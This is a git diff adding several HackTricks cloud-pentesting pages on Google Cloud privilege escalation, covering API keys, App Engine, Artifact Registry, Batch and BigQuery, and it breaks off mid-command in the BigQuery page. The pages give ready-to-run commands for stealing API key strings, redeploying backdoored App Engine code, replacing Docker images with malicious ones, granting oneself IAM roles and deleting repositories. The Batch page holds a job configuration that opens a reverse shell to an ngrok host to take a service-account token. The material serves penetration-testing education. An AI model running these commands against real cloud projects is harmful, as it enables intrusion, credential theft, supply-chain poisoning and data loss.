+++ b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-apikeys-privesc.md
@@ -0,0 +1,105 @@
+# GCP - Apikeys Privesc
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Apikeys
+
+The following permissions are useful to create and steal API keys, not this from the docs: _An API key is a simple encrypted string that **identifies an application without any principal**. They are useful for accessing **public data anonymously**, and are used to **associate** API requests with your project for quota and **billing**._
+
+Therefore, with an API key you can make that company pay for your use of the API, but you won't be able to escalate privileges.
+
+For more information about API Keys check:
+
+{% content-ref url="../gcp-services/gcp-api-keys-enum.md" %}
+[gcp-api-keys-enum.md](../gcp-services/gcp-api-keys-enum.md)
+{% endcontent-ref %}
+
+For other ways to create API keys check:
+
+{% content-ref url="gcp-serviceusage-privesc.md" %}
+[gcp-serviceusage-privesc.md](gcp-serviceusage-privesc.md)
+{% endcontent-ref %}
+
+### Brute Force API Key access <a href="#apikeys.keys.create" id="apikeys.keys.create"></a>
+
+As you might not know which APIs are enabled in the project or the restrictions applied to the API key you found, it would be interesting to run the tool [**https://github.com/ozguralp/gmapsapiscanner**](https://github.com/ozguralp/gmapsapiscanner) and check **what you can access with the API key.**
+
+### `apikeys.keys.create` <a href="#apikeys.keys.create" id="apikeys.keys.create"></a>
+
+This permission allows to **create an API key**:
+
+```bash
+gcloud services api-keys create
+Operation [operations/akmf.p7-[...]9] complete. Result: {
+    "@type":"type.googleapis.com/google.api.apikeys.v2.Key",
+    "createTime":"2022-01-26T12:23:06.281029Z",
+    "etag":"W/\"HOhA[...]==\"",
+    "keyString":"AIzaSy[...]oU",
+    "name":"projects/5[...]6/locations/global/keys/f707[...]e8",
+    "uid":"f707[...]e8",
+    "updateTime":"2022-01-26T12:23:06.378442Z"
+}
+```
+
+You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp_privesc_scripts/blob/main/tests/b-apikeys.keys.create.sh).
+
+{% hint style="danger" %}
+Note that by default users have permissions to create new projects adn they are granted Owner role over the new project. So a user could c**reate a project and an API key inside this project**.
+{% endhint %}
+
+### `apikeys.keys.getKeyString` , `apikeys.keys.list` <a href="#apikeys.keys.getkeystringapikeys.keys.list" id="apikeys.keys.getkeystringapikeys.keys.list"></a>
+
+These permissions allows **list and get all the apiKeys and get the Key**:
+
+```bash
+for  key  in  $(gcloud services api-keys list --uri); do
+	gcloud services api-keys get-key-string "$key"
+done
+```
+
+You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp_privesc_scripts/blob/main/tests/c-apikeys.keys.getKeyString.sh).
+
+### `apikeys.keys.undelete` , `apikeys.keys.list` <a href="#serviceusage.apikeys.regenerateapikeys.keys.list" id="serviceusage.apikeys.regenerateapikeys.keys.list"></a>
+
+These permissions allow you to **list and regenerate deleted api keys**. The **API key is given in the output** after the **undelete** is done:
+
+```bash
+gcloud services api-keys list --show-deleted
+gcloud services api-keys undelete <key-uid>
+```
+
+### Create Internal OAuth Application to phish other workers
+
+Check the following page to learn how to do this, although this action belongs to the service **`clientauthconfig`** [according to the docs](https://cloud.google.com/iap/docs/programmatic-oauth-clients#before-you-begin):
+
+{% content-ref url="../../workspace-security/gws-google-platforms-phishing/" %}
+[gws-google-platforms-phishing](../../workspace-security/gws-google-platforms-phishing/)
+{% endcontent-ref %}
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-appengine-privesc.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-appengine-privesc.md
new file mode 100644
index 0000000000..b9ced0feb2
--- /dev/null
+++ b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-appengine-privesc.md
@@ -0,0 +1,141 @@
+# GCP - AppEngine Privesc
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## App Engine
+
+For more information about App Engine check:
+
+{% content-ref url="../gcp-services/gcp-app-engine-enum.md" %}
+[gcp-app-engine-enum.md](../gcp-services/gcp-app-engine-enum.md)
+{% endcontent-ref %}
+
+### `appengine.applications.get`, `appengine.instances.get`, `appengine.instances.list`, `appengine.operations.get`, `appengine.operations.list`, `appengine.services.get`, `appengine.services.list`, `appengine.versions.create`, `appengine.versions.get`, `appengine.versions.list`, `cloudbuild.builds.get`,`iam.serviceAccounts.actAs`, `resourcemanager.projects.get`, `storage.objects.create`, `storage.objects.list`
+
+Those are the needed permissions to **deploy an App using `gcloud` cli**. Maybe the **`get`** and **`list`** ones could be **avoided**.
+
+You can find python code examples in [https://github.com/GoogleCloudPlatform/python-docs-samples/tree/main/appengine](https://github.com/GoogleCloudPlatform/python-docs-samples/tree/main/appengine)
+
+By default, the name of the App service is going to be **`default`**, and there can be only 1 instance with the same name.\
+To change it and create a second App, in **`app.yaml`**, change the value of the root key to something like **`service: my-second-app`**
+
+```bash
+cd python-docs-samples/appengine/flexible/hello_world
+gcloud app deploy #Upload and start application inside the folder
+```
+
+Give it at least 10-15min, if it doesn't work call **deploy another of times** and wait some minutes.
+
+{% hint style="info" %}
+It's **possible to indicate the Service Account to use** but by default, the App Engine default SA is used.
+{% endhint %}
+
+The URL of the application is something like `https://<proj-name>.oa.r.appspot.com/` or `https://<service_name>-dot-<proj-name>.oa.r.appspot.com`
+
+### Update equivalent permissions
+
+You might have enough permissions to update an AppEngine but not to create a new one. In that case this is how you could update the current App Engine:
+
+```bash
+# Find the code of the App Engine in the buckets
+gsutil ls
+
+# Download code
+mkdir /tmp/appengine2
+cd /tmp/appengine2
+## In this case it was found in this custom bucket but you could also use the 
+## buckets generated when the App Engine is created
+gsutil cp gs://appengine-lab-1-gcp-labs-4t04m0i6-3a97003354979ef6/labs_appengine_1_premissions_privesc.zip .
+unzip labs_appengine_1_premissions_privesc.zip
+
+## Now modify the code..
+
+## If you don't have an app.yaml, create one like:
+cat >> app.yaml <<EOF
+runtime: python312
+
+entrypoint: gunicorn -b :\$PORT main:app
+
+env_variables:
+  A_VARIABLE: "value"
+EOF
+
+# Deploy the changes
+gcloud app deploy
+
+# Update the SA if you need it (and if you have actas permissions)
+gcloud app update --service-account=<sa>@$PROJECT_ID.iam.gserviceaccount.com
+```
+
+If you have **already compromised a AppEngine** and you have the permission **`appengine.applications.update`** and **actAs** over the service account to use you could modify the service account used by AppEngine with:
+
+```bash
+gcloud app update --service-account=<sa>@$PROJECT_ID.iam.gserviceaccount.com
+```
+
+### `appengine.instances.enableDebug`, `appengine.instances.get`, `appengine.instances.list`, `appengine.operations.get`, `appengine.services.get`, `appengine.services.list`, `appengine.versions.get`, `appengine.versions.list`, `compute.projects.get`
+
+With these permissions, it's possible to **login via ssh in App Engine instances** of type **flexible** (not standard). Some of the **`list`** and **`get`** permissions **could not be really needed**.
+
+```bash
+gcloud app instances ssh --service <app-name> --version <version-id> <ID>
+```
+
+### `appengine.applications.update`, `appengine.operations.get`
+
+I think this just change the background SA google will use to setup the applications, so I don't think you can abuse this to steal the service account.
+
+{% code overflow="wrap" %}
+```bash
+gcloud app update --service-account=<sa_email>
+```
+{% endcode %}
+
+### `appengine.versions.getFileContents`, `appengine.versions.update`
+
+Not sure how to use these permissions or if they are useful (note that when you change the code a new version is created so I don't know if you can just update the code or the IAM role of one, but I guess you should be able to, maybe changing the code inside the bucket??).
+
+### Write Access over the buckets
+
+As mentioned the appengine versions generate some data inside a bucket with the format name: `staging.<project-id>.appspot.com`. Note that it's not possible to pre-takeover this bucket because GCP users aren't authorized to generate buckets using the domain name `appspot.com`.
+
+However, with read & write access over this bucket, it's possible to escalate privileges to the SA attached to the AppEngine version by monitoring the bucket and any time a change is performed, modify as fast as possible the code. This way, the container that gets created from this code will **execute the backdoored code**.
+
+For more information and a **PoC check the relevant information from this page**:
+
+{% content-ref url="gcp-storage-privesc.md" %}
+[gcp-storage-privesc.md](gcp-storage-privesc.md)
+{% endcontent-ref %}
+
+### Write Access over the Artifact Registry
+
+Even though App Engine creates docker images inside Artifact Registry. It was tested that **even if you modify the image inside this service** and removes the App Engine instance (so a new one is deployed) the **code executed doesn't change**.\
+It might be possible that performing a **Race Condition attack like with the buckets it might be possible to overwrite the executed code**, but this wasn't tested.
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-artifact-registry-privesc.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-artifact-registry-privesc.md
new file mode 100644
index 0000000000..9d868f485f
--- /dev/null
+++ b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-artifact-registry-privesc.md
@@ -0,0 +1,210 @@
+# GCP - Artifact Registry Privesc
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Artifact Registry
+
+For more information about Artifact Registry check:
+
+{% content-ref url="../gcp-services/gcp-artifact-registry-enum.md" %}
+[gcp-artifact-registry-enum.md](../gcp-services/gcp-artifact-registry-enum.md)
+{% endcontent-ref %}
+
+### artifactregistry.repositories.uploadArtifacts
+
+With this permission an attacker could upload new versions of the artifacts with malicious code like Docker images:
+
+{% code overflow="wrap" %}
+```bash
+# Configure docker to use gcloud to authenticate with Artifact Registry
+gcloud auth configure-docker <location>-docker.pkg.dev
+
+# tag the image to upload it
+docker tag <local-img-name>:<local-tag> <location>-docker.pkg.dev/<proj-name>/<repo-name>/<img-name>:<tag>
+
+# Upload it
+docker push <location>-docker.pkg.dev/<proj-name>/<repo-name>/<img-name>:<tag>
+```
+{% endcode %}
+
+{% hint style="danger" %}
+It was checked that it's **possible to upload a new malicious docker** image with the same name and tag as the one already present, so the **old one will lose the tag** and next time that image with that tag is **downloaded the malicious one** will be downloaded.
+{% endhint %}
+
+<details>
+
+<summary>Upload a Python library</summary>
+
+**Start by creating the library to upload** (if you can download the latest version from the registry you can avoid this step):
+
+1.  **Set up your project structure**:
+
+    * Create a new directory for your library, e.g., `hello_world_library`.
+    * Inside this directory, create another directory with your package name, e.g., `hello_world`.
+    * Inside your package directory, create an `__init__.py` file. This file can be empty or can contain initializations for your package.
+
+    ```bash
+    mkdir hello_world_library
+    cd hello_world_library
+    mkdir hello_world
+    touch hello_world/__init__.py
+    ```
+2.  **Write your library code**:
+
+    * Inside the `hello_world` directory, create a new Python file for your module, e.g., `greet.py`.
+    * Write your "Hello, World!" function:
+
+    ```python
+    # hello_world/greet.py
+    def say_hello():
+        return "Hello, World!"
+    ```
+3.  **Create a `setup.py` file**:
+
+    * In the root of your `hello_world_library` directory, create a `setup.py` file.
+    * This file contains metadata about your library and tells Python how to install it.
+
+    ```python
+    # setup.py
+    from setuptools import setup, find_packages
+
+    setup(
+        name='hello_world',
+        version='0.1',
+        packages=find_packages(),
+        install_requires=[
+            # Any dependencies your library needs
+        ],
+    )
+    ```
+
+**Now, lets upload the library:**
+
+1.  **Build your package**:
+
+    * From the root of your `hello_world_library` directory, run:
+
+    ```sh
+    python3 setup.py sdist bdist_wheel
+    ```
+2. **Configure authentication for twine** (used to upload your package):
+   * Ensure you have `twine` installed (`pip install twine`).
+   * Use `gcloud` to configure credentials:
+
+{% code overflow="wrap" %}
+````
+```sh
+twine upload --username 'oauth2accesstoken' --password "$(gcloud auth print-access-token)" --repository-url https://<location>-python.pkg.dev/<project-id>/<repo-name>/ dist/*
+```
+````
+{% endcode %}
+
+3. **Clean the build**
+
+```bash
+rm -rf dist build hello_world.egg-info
+```
+
+</details>
+
+{% hint style="danger" %}
+It's not possible to upload a python library with the same version as the one already present, but it's possible to upload **greater versions** (or add an extra **`.0` at the end** of the version if that works -not in python though-), or to **delete the last version an upload a new one with** (needed `artifactregistry.versions.delete)`**:**
+
+{% code overflow="wrap" %}
+```sh
+gcloud artifacts versions delete <version> --repository=<repo-name> --location=<location> --package=<lib-name>
+```
+{% endcode %}
+{% endhint %}
+
+### `artifactregistry.repositories.downloadArtifacts`
+
+With this permission you can **download artifacts** and search for **sensitive information** and **vulnerabilities**.
+
+Download a **Docker** image:
+
+```sh
+# Configure docker to use gcloud to authenticate with Artifact Registry
+gcloud auth configure-docker <location>-docker.pkg.dev
+
+# Dowload image
+docker pull <location>-docker.pkg.dev/<proj-name>/<repo-name>/<img-name>:<tag>
+```
+
+Download a **python** library:
+
+{% code overflow="wrap" %}
+```bash
+pip install <lib-name> --index-url "https://oauth2accesstoken:$(gcloud auth print-access-token)@<location>-python.pkg.dev/<project-id>/<repo-name>/simple/" --trusted-host <location>-python.pkg.dev --no-cache-dir
+```
+{% endcode %}
+
+* What happens if a remote and a standard registries are mixed in a virtual one and a package exists in both? Check this page:
+
+{% content-ref url="../gcp-persistence/gcp-artifact-registry-persistence.md" %}
+[gcp-artifact-registry-persistence.md](../gcp-persistence/gcp-artifact-registry-persistence.md)
+{% endcontent-ref %}
+
+### `artifactregistry.tags.delete`, `artifactregistry.versions.delete`, `artifactregistry.packages.delete`, (`artifactregistry.repositories.get`, `artifactregistry.tags.get`, `artifactregistry.tags.list`)
+
+Delete artifacts from the registry, like docker images:
+
+{% code overflow="wrap" %}
+```bash
+# Delete a docker image
+gcloud artifacts docker images delete <location>-docker.pkg.dev/<proj-name>/<repo-name>/<img-name>:<tag>
+```
+{% endcode %}
+
+### `artifactregistry.repositories.delete`
+
+Detele a full repository (even if it has content):
+
+{% code overflow="wrap" %}
+```
+gcloud artifacts repositories delete <repo-name> --location=<location>
+```
+{% endcode %}
+
+### `artifactregistry.repositories.setIamPolicy`
+
+An attacker with this permission could give himself permissions to perform some of the previously mentioned repository attacks.
+
+### Pivoting to other Services through Artifact Registry Read & Write
+
+* **Cloud Functions**
+
+When a Cloud Function is created a new docker image is pushed to the Artifact Registry of the project. I tried to modify the image with a new one, and even delete the current image (and the `cache` image) and nothing changed, the cloud function continue working. Therefore, maybe it **might be possible to abuse a Race Condition attack** like with the bucket to change the docker container that will be run but **just modifying the stored image isn't possible to compromise the Cloud Function**.
+
+* **App Engine**
+
+Even though App Engine creates docker images inside Artifact Registry. It was tested that **even if you modify the image inside this service** and removes the App Engine instance (so a new one is deployed) the **code executed doesn't change**.\
+It might be possible that performing a **Race Condition attack like with the buckets it might be possible to overwrite the executed code**, but this wasn't tested.
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-batch-privesc.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-batch-privesc.md
new file mode 100644
index 0000000000..7f41fa8b82
--- /dev/null
+++ b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-batch-privesc.md
@@ -0,0 +1,84 @@
+# GCP - Batch Privesc
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Batch
+
+Basic information:
+
+{% content-ref url="../gcp-services/gcp-batch-enum.md" %}
+[gcp-batch-enum.md](../gcp-services/gcp-batch-enum.md)
+{% endcontent-ref %}
+
+### `batch.jobs.create`, `iam.serviceAccounts.actAs`
+
+It's possible to create a batch job, get a reverse shell and exfiltrate the metadata token of the SA (compute SA by default).
+
+```bash
+gcloud beta batch jobs submit job-lxo3b2ub --location us-east1 --config - <<EOD
+{
+  "name": "projects/gcp-labs-35jfenjy/locations/us-central1/jobs/job-lxo3b2ub",
+  "taskGroups": [
+    {
+      "taskCount": "1",
+      "parallelism": "1",
+      "taskSpec": {
+        "computeResource": {
+          "cpuMilli": "1000",
+          "memoryMib": "512"
+        },
+        "runnables": [
+          {
+            "script": {
+              "text": "/bin/bash -c 'bash -i >& /dev/tcp/8.tcp.ngrok.io/10396 0>&1'\n"
+            }
+          }
+        ],
+        "volumes": []
+      }
+    }
+  ],
+  "allocationPolicy": {
+    "instances": [
+      {
+        "policy": {
+          "provisioningModel": "STANDARD",
+          "machineType": "e2-micro"
+        }
+      }
+    ]
+  },
+  "logsPolicy": {
+    "destination": "CLOUD_LOGGING"
+  }
+}
+EOD
+```
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-bigquery-privesc.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-bigquery-privesc.md
new file mode 100644
index 0000000000..9e71e3856b
--- /dev/null
+++ b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-bigquery-privesc.md
@@ -0,0 +1,149 @@
+# GCP - BigQuery Privesc
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## BigQuery
+
+For more information about BigQuery check:
+
+{% content-ref url="../gcp-services/gcp-bigquery-enum.md" %}
+[gcp-bigquery-enum.md](../gcp-services/gcp-bigquery-enum.md)
+{% endcontent-ref %}
+
+### Read Table
+
+Reading the information stored inside the a BigQuery table it might be possible to find s**ensitive information**. To access the info the permission needed is **`bigquery.tables.get`** , **`bigquery.jobs.create`** and **`bigquery.tables.getData`**:
+
+```bash
+bq head <dataset>.<table>
+bq query --nouse_legacy_sql 'SELECT * FROM `<proj>.<dataset>.<table-name>` LIMIT 1000'
+```
+
+### Export data
+
+This is another way to access the data. **Export it to a cloud storage bucket** and the **download the files** with the information.\
+To perform this action the following permissions are needed: **`bigquery.tables.export`**, **`bigquery.jobs.create`** and **`storage.objects.create`**.
+
+```bash
+bq extract <dataset>.<table> "gs://<bucket>/table*.csv" 
+```
+
+### Insert data
+
+It might be possible to **introduce certain trusted data** in a Bigquery table to abuse a **vulnerability in some other place.** This can be easily done with the permissions **`bigquery.tables.get`** , **`bigquery.tables.updateData`** and **`bigquery.jobs.create`**:
+
+{% code overflow="wrap" %}
+```bash
+# Via query
+bq query --nouse_legacy_sql 'INSERT INTO `<proj>.<dataset>.<table-name>` (rank, refresh_date, dma_name, dma_id, term, week, score) VALUES (22, "2023-12-28", "Baltimore MD", 512, "Ms", "2019-10-13", 62), (22, "2023-12-28", "Baltimore MD", 512, "Ms", "2020-05-24", 67)'
+
+# Via insert param
+bq insert dataset.table /tmp/mydata.json
+```
+{% endcode %}
+
+### `bigquery.datasets.setIamPolicy`
+
+An attacker could abuse this privilege to **give himself further permissions** over a BigQuery dataset:
+
+```bash
+# For this you also need bigquery.tables.getIamPolicy
+bq add-iam-policy-binding \
+    --member='user:<email>' \
+    --role='roles/bigquery.admin' \
+    <proj>:<dataset>
+
+# use the set-iam-policy if you don't have bigquery.tables.getIamPolicy
+```
+
+### `bigquery.datasets.update`, (`bigquery.datasets.get`)
+
+Just this permission allows to **update your access over a BigQuery dataset by modifying the ACLs** that indicate who can access it:
+
+```bash
+# Download current permissions, reqires bigquery.datasets.get
+bq show --format=prettyjson <proj>:<dataset> > acl.json
+## Give permissions to the desired user
+bq update --source acl.json <proj>:<dataset>
+## Read it with
+bq head $PROJECT_ID:<dataset>.<table>
+```
+
+### `bigquery.tables.setIamPolicy`
+
+An attacker could abuse this privilege to **give himself further permissions** over a BigQuery table:
+
+```bash
+# For this you also need bigquery.tables.setIamPolicy
+bq add-iam-policy-binding \
+    --member='user:<email>' \
+    --role='roles/bigquery.admin' \
+    <proj>:<dataset>.<table>
+
+# use the set-iam-policy if you don't have bigquery.tables.setIamPolicy
+```
+
+### `bigquery.rowAccessPolicies.update`, `bigquery.rowAccessPolicies.setIamPolicy`, `bigquery.tables.getData`, `bigquery.jobs.create`
+
+According to the docs, with the mention permissions it's possible to **update a row policy.**\
+However, **using the cli `bq`** you need some more: **`bigquery.rowAccessPolicies.create`**, **`bigquery.tables.get`**.
+
+{% code overflow="wrap" %}
+```bash
+bq query --nouse_legacy_sql 'CREATE OR REPLACE ROW ACCESS POLICY <filter_id> ON `<proj>.<dataset-name>.<table-name>` GRANT TO ("<user:user@email.xyz>") FILTER USING (term = "Cfba");' # A example filter was used
+```
+{% endcode %}
+
+It's possible to find the filter ID in the output of the row policies enumeration. Example:
+
+```bash
+ bq ls --row_access_policies <proj>:<dataset>.<table>
+ 
+      Id        Filter Predicate            Grantees              Creation Time    Last Modified Time
+ ------------- ------------------ ----------------------------- ----------------- --------------------
+  apac_filter   term = "Cfba"      user:asd@hacktricks.xyz   21 Jan 23:32:09   21 Jan 23:32:09
+```
+
+If you have **`bigquery.rowAccessPolicies.delete`** instead of `bigquery.rowAccessPolicies.update` you could also just delete the policy:
+
+{% code overflow="wrap" %}
+```bash
